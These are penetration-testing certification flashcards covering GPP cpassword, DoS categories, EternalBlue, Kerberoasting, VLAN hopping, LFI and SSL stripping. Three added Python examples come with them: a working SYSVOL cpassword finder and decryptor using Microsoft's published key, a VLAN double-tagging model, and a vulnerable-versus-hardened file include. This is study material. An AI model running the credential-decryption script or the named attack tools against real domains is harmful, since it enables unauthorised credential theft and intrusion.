The cpassword attribute found in Group Policy Preferences XML files is a glaring security vulnerability due chiefly to the use of a single static AES key for all such entries, and to the open publication of that key by Microsoft in its protocol documentation. If a cpassword attribute is found in a Group Policy Object (stored in the SYSVOL share, which every domain user can read), it is as good as a plaintext password: any domain user can base64-decode and decrypt it offline. The cpassword attribute can appear in several Preferences files, including Groups\Groups.xml, Services\Services.xml, ScheduledTasks\ScheduledTasks.xml, Printers\Printers.xml, Drives\Drives.xml, and DataSources\DataSources.xml. MS14-025 removed the ability to set new passwords this way, but existing entries remain in SYSVOL until an administrator deletes them.

A, B, and C are incorrect. The attributes changeLogon, neverExpires, and acctDisabled are typically found alongside cpassword in the same files, but they do not represent a security flaw in and of themselves. Rather, they represent the status of the associated account, indicating whether the user must change their password at next logon, whether the password never expires, and whether the account is disabled, respectively.
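The following Python is an added example (not from the flashcards) of the first step a tester performs after mounting SYSVOL: walk the Preferences files named above, pull out every cpassword together with the account it belongs to, and restore the base64 padding that Group Policy strips. The sample Groups.xml is constructed (its clsid values are placeholders and its cpassword is random base64 that decrypts to nothing meaningful); the file names and the AES key are the ones Microsoft documented for Group Policy Preferences. Decryption is included for completeness but needs the third-party cryptography package.

```python
r"""Find Group Policy Preferences cpassword values in SYSVOL XML.

Added example. The sample XML is constructed; the file names and the AES
key are those documented by Microsoft for GPP (MS-GPPREF).
"""
import base64
import os
import xml.etree.ElementTree as ET

# GPP XML files that may carry a cpassword attribute, found under
# <GPO>\{Machine,User}\Preferences\<Category>\ in SYSVOL
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "Printers.xml", "Drives.xml", "DataSources.xml"}

# AES-256 key published in Microsoft's MS-GPPREF specification; every
# cpassword in every domain is encrypted with it (CBC mode, zero IV).
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")


def pad_b64(value: str) -> str:
    """GPP strips the '=' padding; restore it so base64 decoding succeeds."""
    return value + "=" * (-len(value) % 4)


def find_cpasswords(xml_text: str, source: str = "<memory>") -> list[dict]:
    """Return one record per element that carries a cpassword attribute."""
    hits = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        cp = elem.get("cpassword")
        if cp is None:
            continue
        hits.append({
            "source": source,
            "element": elem.tag,
            # Groups/Drives use userName, Services accountName,
            # ScheduledTasks runAs, Printers/DataSources username
            "user": (elem.get("userName") or elem.get("accountName")
                     or elem.get("runAs") or elem.get("username")),
            "cpassword": pad_b64(cp),
            "disabled": elem.get("acctDisabled") == "1",
        })
    return hits


def scan_sysvol(root_dir: str) -> list[dict]:
    """Walk a mounted SYSVOL copy and collect every cpassword found."""
    hits = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8-sig") as fh:  # drop the BOM
                    hits.extend(find_cpasswords(fh.read(), path))
    return hits


def decrypt_cpassword(padded_b64: str) -> str:
    """Recover the plaintext (UTF-16LE, PKCS#7 padded); needs `cryptography`."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    data = base64.b64decode(padded_b64)
    dec = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(b"\x00" * 16)).decryptor()
    plain = dec.update(data) + dec.finalize()
    return plain[:-plain[-1]].decode("utf-16-le")


# Constructed Groups.xml in the layout GPP writes; clsid values are placeholders
# and the cpassword is random base64, not a real encrypted password.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{00000000-0000-0000-0000-000000000001}">
  <User clsid="{00000000-0000-0000-0000-000000000002}" name="localadmin" image="2">
    <Properties action="U" newName="" fullName="" description="helpdesk local admin"
      cpassword="AzVJmXh/J9KrU5n0czX1uBPOSAc/9q1ZLx7WbqDzw6Y"
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
      userName="localadmin"/>
  </User>
</Groups>
"""
```

Point scan_sysvol at a copy of \\<domain>\SYSVOL\<domain>\Policies (or a mount of it) and feed each record's cpassword to decrypt_cpassword; the disabled flag is worth keeping, since a password for a disabled local account is frequently reused elsewhere.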

24
Q
This category of distributed DoS attack focuses on oversaturating server resources, with its severity measured in packets per second (Pps):
A.Application layer attack
B.Volume-based attack
C.ICMP flooding
D.Protocol attack
A

D.Protocol attack

Explanation:
A protocol attack is one that is focused on locking up a target system by consuming all available system resources, such as processing capability, memory, or connection state tables (a SYN flood that fills the TCP backlog is the classic example). Because each packet costs the target work regardless of its size, attack severity is measured in packets per second, or Pps.

A, B, and C are incorrect. A is incorrect because an application layer attack attempts to crash a specific service on a target system, rather than bring the entire system down by consuming its available CPU, memory, or storage assets. Application layer attacks are measured in requests per second, or Rps. B is incorrect because a volume-based attack is one that attempts to consume a target’s available bandwidth (rather than system CPU cycles, memory, or storage), effectively knocking it offline. Volume-based attacks are measured in bits per second, or bps. C is incorrect because ICMP flooding is a specific example of a volume-based attack, which is itself an incorrect answer. ICMP flooding is a denial of service attack method that focuses on consuming available network bandwidth by filling it with constant ICMP echo requests, effectively wasting bandwidth that would otherwise be used by legitimate traffic. Since these attacks do not target server CPU, memory, or storage resources, this answer is incorrect.

25
Q
Addressed by Microsoft Security Bulletin MS17-010, which exploit abuses the handling of certain packets by SMBv1 to achieve remote code execution?
A.EternalRed
B.Dirty COW
C.HeartBleed
D.EternalBlue
A

D.EternalBlue

Explanation:
Addressed by Microsoft Security Bulletin MS17-010 and tracked as CVE-2017-0144, EternalBlue exploits a buffer overflow in the SMBv1 server’s handling of specially crafted packets to provide unauthenticated remote code execution on unpatched Windows systems from Windows XP and Server 2003 through Windows 10 and Server 2016. It was leaked by the Shadow Brokers in 2017 and used by WannaCry and NotPetya shortly afterwards.

A, B, and C are incorrect. A is incorrect because EternalRed (CVE-2017-7494) is a remote code execution vulnerability in Samba, the open source SMB implementation used on Unix-like systems. EternalRed is not addressed by MS17-010, making this answer incorrect. B is incorrect because Dirty COW (Copy-on-Write, CVE-2016-5195) is a Linux kernel vulnerability that could be leveraged to achieve local privilege escalation. Since the vulnerability listed in the question explicitly targets Windows systems, this is incorrect. C is incorrect because Heartbleed (CVE-2014-0160) is a vulnerability in OpenSSL’s TLS heartbeat extension that leaks server memory, which could be used to steal web server private keys or user session cookies. Since Heartbleed is neither applicable to SMBv1 nor addressed by MS17-010, this answer is incorrect.

26
Q
Which of the following are tactics for information collection per MITRE’s ATT&CK matrix? (Choose two.)
A.Data encryption
B.Clipboard data
C.Screen capture
D.Password policy discovery
A

B.Clipboard data
C.Screen capture

Explanation:
In MITRE’s ATT&CK matrix, Clipboard Data and Screen Capture are techniques under the Collection tactic: they gather data from the compromised host (the contents of the clipboard, images of the screen) that the adversary may later exfiltrate or reuse, for instance credentials copied out of a password manager.

A and D are incorrect. Neither of these choices falls under the Collection tactic. A is incorrect because encrypting data before it leaves the network is a technique listed under the Exfiltration tactic. D is incorrect because Password Policy Discovery is a technique under the Discovery tactic, used to learn the password requirements and lockout thresholds of a target system or domain, for example before a password spraying attack.

27
Q
Which attack against Bluetooth-enabled devices effectively denies use of Bluetooth functionality?
A.Bluesmacking
B.SYN flooding
C.Bluejacking
D.Ping flooding
A

A.Bluesmacking

Explanation:
Bluesmacking may be most easily understood as the Bluetooth equivalent of an ICMP flood (or, more precisely, a ping of death) against a TCP/IP target: the attack is implemented through echo requests at the L2CAP layer, for example with the l2ping tool from BlueZ, which lets the attacker choose the packet size. By sending oversized or rapid-fire L2CAP echo requests, an attacker can crash or stall the victim’s Bluetooth stack.

B, C, and D are incorrect. B and D are incorrect because SYN flooding and ping flooding are DoS attacks that target TCP/IP network devices, ultimately attempting to consume server resources and bandwidth until the target system is no longer available. Since Bluetooth does not rely on TCP/IP networking, these are incorrect. C is incorrect because bluejacking is a technique used to send unsolicited mobile messages and information to victims via Bluetooth connections. Since the question asked about an attack that is used to deny service, this answer is incorrect.

28
Q
Which attack method exploits Active Directory’s continued support for legacy Windows clients (RC4-based Kerberos encryption), resulting in an attacker obtaining a weakly encrypted ticket-granting service (TGS) ticket that uses the NTLM hash of the service account as the encryption key? By obtaining such a ticket, the attacker can attempt to crack it offline to recover the service account’s password, allowing for privilege escalation, lateral movement, or persistence in a given system or environment.
A.Plaintext LDAP Credential Transmission
B.Kerberoasting
C.Scheduled Task Abuse
D.Insecure Sudo Access
A

B.Kerberoasting

Explanation:
The attack described is Kerberoasting. Any authenticated domain user can request a service ticket for any account that has a Service Principal Name (SPN); if the ticket is issued with RC4-HMAC (encryption type 23), it is encrypted with the service account’s NT hash, and the attacker can brute-force the account’s password offline without sending a single failed logon to the domain controller. Modules to simplify this attack are found in both PowerSploit (Invoke-Kerberoast) and Empire, as well as in Impacket’s GetUserSPNs.py and Rubeus; the resulting hashes are cracked with hashcat or John the Ripper. Mitigations include long random passwords or Group Managed Service Accounts for services, enabling AES for Kerberos, and alerting on TGS requests (event 4769) with encryption type 0x17.

A, C, and D are incorrect. A is incorrect because interception of plaintext LDAP credentials does not rely on Active Directory support for older, legacy Windows clients to obtain NTLM hashes. Rather, it allows credential harvesting to occur if the application making the LDAP request performs a simple bind without LDAPS (LDAP over SSL/TLS) or StartTLS. This is because the application transfers the username and password in plaintext in the bind request, leaving it vulnerable to sniffing via a network protocol analyzer like Wireshark. C is incorrect because scheduled task abuse occurs most often when a script or .bat file run as part of a scheduled task is world-writable, creating openings for privilege escalation, lateral movement, or persistence. Since there is no abuse of Active Directory support for legacy Windows clients, this answer is also incorrect. D is incorrect because insecure sudo access is a privilege escalation vector found in *nix environments; since the attack vector described targets NTLM hashes, as used in a Windows environment, this answer is incorrect.

29
Q

Which of the following is a security enhancement in SNMPv3 over the previous iterations?
A.2FA is enforced, requiring access to both a password and a security token.
B.Authentication requires a username and password in version 3.
C.The default community string was changed from “public” to “open” to circumvent existing wordlists.
D.Trap notifications now require an administrator’s signoff before being sent to the SNMP manager.

A

B.Authentication requires a username and password in version 3.

Explanation:
In SNMP versions 1 and 2c, authentication only required knowledge of the community string, which was transmitted in plaintext between managers and agents. SNMPv3 introduces the User-based Security Model: a username plus an authentication passphrase (HMAC-MD5 or HMAC-SHA), and optionally a privacy passphrase that encrypts the traffic (the authPriv security level). Because a username and password are now required, unauthenticated users are prevented from gaining access to the SNMP agent and obtaining information about the environment, and, when privacy is enabled, a sniffer no longer sees the responses either.

A, C, and D are incorrect. A is incorrect because while SNMPv3 now requires a username and password, the protocol standard does not require multifactor authentication. C is incorrect because no change was made to the community or private strings; in addition, such a change would make no net difference in security, as attackers would simply add the new community string value to their existing wordlists. D is incorrect and would effectively negate the entire purpose of SNMP; if sending notifications required manual intervention, it would no longer be an automated means of network monitoring.

30
Q
A methodical approach to defeating a lock, which technique relies on interacting with a lock and its pins in series, addressing them in the order in which they bind the most when pressure is applied with a torque wrench?
A.Bumping
B.Double ball
C.Tailgating
D.Single pin picking
A

D.Single pin picking

Explanation:
Single pin picking is a slower, more methodical approach to lockpicking that can produce great results, but is costly in terms of time required and the potential for exposure. Put simply, light rotational tension is applied to the plug with a tension (torque) wrench while the lock is probed with a pick; because of manufacturing tolerances, one pin binds harder than the others, and that pin is lifted until its driver pin clears the shear line and sets on the ledge created by the slight rotation of the plug. At this point, another pin begins to bind, making it the new target. This process repeats until all pins are set and the plug completes its turn, unlocking the lock.

A, B, and C are incorrect. A is incorrect because “bumping” is a lock-picking technique that relies on the use of specially made “bump keys” and a tool called a bump hammer, which is used to “bump” the bump key while attempting to turn the plug; conventional wisdom considers it faster than single pin picking, but louder. B is incorrect because a double ball is a specific type of pick, rather than a picking technique. Ball and double ball picks are meant to be used when picking locks that use wafers as the main binding mechanism, rather than pins. This typically includes desks, file cabinets, and even some glove boxes in cars. C is incorrect because tailgating is used to gain access to a facility after an authorized individual has legitimately opened an access point, rather than a direct attempt to defeat a security mechanism. Basic courtesies are in these situations a security flaw: people are too quick to hold a door open for a co-worker, or even someone who simply appears to belong where they are, in spite of the fact that security policies will typically dictate that employees must swipe their access badges every time they enter a controlled area.

31
Q
Which of the following files would not be a target of interest for remote system discovery per MITRE’s ATT&CK framework?
A. /etc/hosts
B./etc/passwd
C.~/.bash_history
D.C:\Windows\System32\Drivers\etc\hosts
A

B./etc/passwd

Explanation:
While still useful for local enumeration of user and system accounts, the /etc/passwd file is the least likely choice to contain any information regarding remote systems, servers, or networks. Since the question asked which file would not be of interest for remote system discovery, B is the correct answer.

A, C, and D are incorrect. All of the files listed in these choices contain information that could be of value in the enumeration of additional remote systems. A and D are incorrect because system hosts files (/etc/hosts and C:\Windows\System32\Drivers\etc\hosts in *nix and Windows operating system families, respectively) serve to map hostnames to IP addresses. Since one of the functions provided by the hosts file is name resolution, it is frequently used to eliminate the need for a name lookup for other services and functions for target systems with which the initial host regularly interacts. This makes hosts files a particularly valuable source of information for remote systems that are commonly accessed by users or services on a given host, and further makes both of these choices incorrect answers. C is incorrect because ~/.bash_history contains all of the commands entered by a user within their bash sessions. If the user connects to remote servers via SSH, SFTP, or other protocols, this information would be collected in the history file, which can then inform a penetration tester of other likely targets for attack or lateral movement. Since this can directly reveal remote systems, it is an incorrect answer.

32
Q
Which of the following are methods of VLAN hopping? (Choose two.)
A.MAC Flapping
B.Double Tagging
C.NAC ByPass
D.Switch spoofing
A

B.Double Tagging
D.Switch spoofing

Explanation:
B is correct because double tagging is a VLAN hopping method wherein the attacker’s frame carries two 802.1Q tags: an outer tag for the attacker’s own VLAN, which is also the native VLAN of the trunk, and an inner tag for the target VLAN. The first switch strips the outer tag when it forwards the frame untagged over the trunk (the native VLAN is untagged by default), so the second switch sees only the inner tag and delivers the frame into the target VLAN as if it originated there. The attack is one-way: replies are not delivered back to the attacker. This technique can be mitigated by ensuring that devices are not left on the default VLAN (VLAN 1), changing the native VLAN on all trunk ports to an otherwise unused VLAN, and by requiring explicit tagging of the native VLAN on all trunk ports (vlan dot1q tag native on Cisco IOS). D is correct because switch spoofing is a VLAN hopping technique wherein the attacking host masquerades as a trunking switch by speaking Cisco’s Dynamic Trunking Protocol (DTP) to negotiate an 802.1Q trunk on its port. Once the port becomes a trunk, the attacker can send and receive tagged traffic for every VLAN allowed on it. This technique requires that DTP is enabled on the port (dynamic auto or dynamic desirable, the defaults on many Cisco switches), and is mitigated by explicitly configuring ports not intended for trunking as access ports (switchport mode access) and disabling DTP (switchport nonegotiate).

A and C are incorrect. A is incorrect because MAC flapping occurs when a switch sees the same MAC address arriving on different ports in rapid succession, for example because two hosts claim the same address or because of a loop; it can be a side effect of a network-based attack on a system or subnet, but it is not itself a method of crossing VLANs. C is incorrect because NAC (Network Access Control) bypasses are a broad category of network-based attack; VLAN hopping is itself an example of a NAC bypass, not a method of it.
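As an added example (not from the flashcards), the following Python builds a double-tagged Ethernet frame and models the two trunked switches from the explanation above, so the effect of each mitigation can be checked: with the attacker on the native VLAN and the native VLAN untagged the frame lands in the target VLAN; moving the native VLAN to an unused number, or tagging the native VLAN, stops the hop. The switch behaviour is a deliberately simplified model, not real switch code, and the MAC addresses, VLAN numbers and payload are constructed.

```python
"""Model 802.1Q double tagging across two trunked switches.

Added example. The switch logic is a simplified model of the attack, not
real switch code; MACs, VLAN numbers and payload are constructed.
"""
import struct

TPID_8021Q = 0x8100
ETHERTYPE_IPV4 = 0x0800


def build_frame(dst: bytes, src: bytes, vids: list[int], ethertype: int,
                payload: bytes) -> bytes:
    """Ethernet frame with stacked 802.1Q tags, outermost first (PCP/DEI = 0)."""
    frame = dst + src
    for vid in vids:
        frame += struct.pack("!HH", TPID_8021Q, vid & 0x0FFF)
    return frame + struct.pack("!H", ethertype) + payload


def parse_tags(frame: bytes) -> tuple[list[int], int, bytes]:
    """Return (VIDs outermost first, inner EtherType, payload)."""
    off, vids = 12, []
    while True:
        (et,) = struct.unpack_from("!H", frame, off)
        if et != TPID_8021Q:
            break
        (tci,) = struct.unpack_from("!H", frame, off + 2)
        vids.append(tci & 0x0FFF)
        off += 4
    return vids, et, frame[off + 2:]


def pop_outer_tag(frame: bytes) -> bytes:
    """Remove the first 802.1Q tag (4 bytes after the two MAC addresses)."""
    return frame[:12] + frame[16:]


def access_switch_to_trunk(frame: bytes, access_vlan: int, native_vlan: int,
                           tag_native: bool = False):
    """Switch 1: the attacker's port is an access port in `access_vlan`.

    Simplified model: a tagged frame is accepted only if its outer VID equals
    the port's VLAN. On the trunk, frames of the native VLAN go untagged
    unless the switch is told to tag the native VLAN, so the outer tag is
    stripped and the attacker's *inner* tag becomes the outermost one.
    Returns the frame as seen on the trunk, or None if dropped.
    """
    vids, _, _ = parse_tags(frame)
    if not vids or vids[0] != access_vlan:
        return None
    if access_vlan == native_vlan and not tag_native:
        return pop_outer_tag(frame)
    return frame


def trunk_to_switch(frame: bytes, native_vlan: int) -> int:
    """Switch 2: untagged -> native VLAN; tagged -> the outermost VID."""
    vids, _, _ = parse_tags(frame)
    return vids[0] if vids else native_vlan


def vlan_hop_result(access_vlan: int, native_vlan: int, target_vlan: int,
                    tag_native: bool = False):
    """Which VLAN does an attacker on `access_vlan` reach with a double tag?"""
    frame = build_frame(b"\xff" * 6, b"\x02\x00\x00\x00\x00\x01",
                        [access_vlan, target_vlan], ETHERTYPE_IPV4,
                        b"constructed payload")
    on_trunk = access_switch_to_trunk(frame, access_vlan, native_vlan, tag_native)
    if on_trunk is None:
        return None
    return trunk_to_switch(on_trunk, native_vlan)


if __name__ == "__main__":
    print("default (native 1, untagged):", vlan_hop_result(1, 1, 20))
    print("native moved to 999:         ", vlan_hop_result(1, 999, 20))
    print("native VLAN tagged:          ", vlan_hop_result(1, 1, 20, tag_native=True))
```

The model also shows why the attack is one-way: nothing in the target VLAN knows to re-add a VLAN 1 tag on the way back, so replies never reach the attacker's port.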

33
Q
Which class of vulnerability occurs when an attacker is able to exploit an improperly configured file inclusion mechanism in a target application in such a way that a web application handles an otherwise inaccessible file, such as the system hosts file or /etc/passwd file in *nix systems?
A.Remote file inclusion
B.HTML injection
C.Reflected XSS
D.Local file inclusion
A

D.Local file inclusion

Explanation:
The attack described is local file inclusion (LFI). LFI vulnerabilities are mitigated through the use of “jail directories” (for example a chroot or an application-enforced base directory) that prevent a running web service or application from traversing the entirety of a host’s file system, and, more importantly, by properly validating user input: canonicalizing the requested path and rejecting anything that resolves outside the allowed directory, or better still, whitelisting the files or file types acceptable for inclusion.

A, B, and C are incorrect. A is incorrect because remote file inclusion would require that the web server load a resource hosted on an external system, rather than a file stored on the local system, as described in the scenario. B is incorrect because HTML injection would show through the addition of malicious HTML to a web server that would then be executed in a visiting victim’s web browser. The attack described instead attacks the server directly in order to achieve disclosure of information or files on the target server that would otherwise be inaccessible, making this answer incorrect. C is incorrect because reflected XSS attacks would require that a user be tricked into clicking a malicious link that sends the payload (typically a snippet of JavaScript that steals the user’s session token or gets them to download a malicious file) to the web server; the web server then does nothing with this payload but feed it back to the victim without storing it locally. The attack described in the question does not target a visiting user’s browser but rather information stored on the web server itself. Moreover, it does not require that a legitimate user click a malicious link, making this answer incorrect.
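The following Python is an added example (not from the flashcards) that places the naive include next to a hardened one implementing the two controls named above: the path is canonicalized and checked against the base directory, and an optional whitelist restricts which files may be included. Instead of touching /etc/passwd, the demo builds a throwaway directory with a web root and a secret file outside it; the directory layout, file names and contents are constructed.

```python
"""Local file inclusion: the naive include beside a hardened one.

Added example. The sandbox directory, file names and contents are
constructed so the demo runs without touching /etc/passwd.
"""
from __future__ import annotations

import os
import tempfile


class UnsafePathError(ValueError):
    """Requested file resolves outside the allowed directory or whitelist."""


def include_vulnerable(base_dir: str, requested: str) -> str:
    """The bug: trusts user input. '../x' walks up, and os.path.join drops
    base_dir entirely when `requested` is absolute ('/etc/passwd')."""
    with open(os.path.join(base_dir, requested)) as fh:
        return fh.read()


def include_safe(base_dir: str, requested: str,
                 allowed: set[str] | None = None) -> str:
    """Resolve the path, then check it is still inside the jail directory.

    realpath() canonicalises '..', '.', and symlinks before the check, so a
    symlink inside base_dir pointing outside is caught too. The optional
    whitelist of relative names is the stricter control.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    # commonpath is immune to the '/var/www' vs '/var/www2' prefix trick
    if os.path.commonpath([base, target]) != base:
        raise UnsafePathError(requested)
    if allowed is not None and os.path.relpath(target, base) not in allowed:
        raise UnsafePathError(requested)
    with open(target) as fh:
        return fh.read()


def blocked(base_dir: str, requested: str, allowed: set[str] | None = None) -> bool:
    """True if the hardened include refuses `requested`."""
    try:
        include_safe(base_dir, requested, allowed)
    except UnsafePathError:
        return True
    return False


def make_sandbox() -> str:
    """Create <tmp>/pages/about.html and <tmp>/secret.txt; return the pages dir."""
    root = tempfile.mkdtemp(prefix="lfi-demo-")
    pages = os.path.join(root, "pages")
    os.mkdir(pages)
    with open(os.path.join(pages, "about.html"), "w") as fh:
        fh.write("<h1>About</h1>\n")
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("TOP SECRET\n")  # stands in for /etc/passwd
    try:  # a symlink inside the web root that escapes it
        os.symlink(os.path.join(root, "secret.txt"), os.path.join(pages, "link.txt"))
    except OSError:
        pass
    return pages


def has_symlink_escape(pages: str) -> bool:
    return os.path.islink(os.path.join(pages, "link.txt"))


if __name__ == "__main__":
    pages = make_sandbox()
    print(include_vulnerable(pages, "../secret.txt"), end="")  # leaks the secret
    for req in ("../secret.txt", "/etc/passwd", "link.txt", "about.html"):
        print(req, "blocked" if blocked(pages, req, {"about.html"}) else "served")
```

Note that the check happens after realpath: validating the raw string (for example stripping "../") is the approach that LFI payloads such as "....//" and URL-encoded dots are designed to defeat.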

34
Q

Which of the following is the best potential use for SSL stripping in a penetration test?
A.Interception of usernames and passwords
B.Tricking a user into connecting to a malicious site rather than their intended destination in order to infect them with malware
C.Cracking the pre-shared key in use on their corporate wireless network
D.Theft of user session cookies

A

A.Interception of usernames and passwords

Explanation:
SSL stripping is performed as part of a man-in-the-middle attack (classically with Moxie Marlinspike’s sslstrip): the attacker intercepts the victim’s initial plaintext HTTP request, follows the redirect to HTTPS on the victim’s behalf, and serves the content back over plain HTTP, so the victim keeps talking to the attacker over HTTP while the attacker talks to the real site over HTTPS. The lack of TLS on the victim’s side means that usernames, passwords, and other sensitive information are transmitted in plaintext, which can then be sniffed as they travel over the network. HTTP Strict Transport Security (HSTS), and in particular the browser preload list, is the defense: a browser that already knows a site is HTTPS-only never makes the initial plaintext request.

B, C, and D are incorrect. B is incorrect because redirecting a user to a (usually malicious) site they did not want to visit is typical of DNS cache poisoning or a watering hole attack. C is incorrect because cracking a pre-shared key is typically the goal of intercepting four-way handshakes in WPA and WPA2 networks. D is incorrect because while theft of user sessions would be possible by intercepting authenticated traffic between a target and a site to which the user is logged in, that session would become invalid once the user logged out or it expired. Interception of usernames and passwords would enable an attacker to log in freely without relying on the user’s session, making it a more effective use of traffic interception, and making session theft an incorrect answer.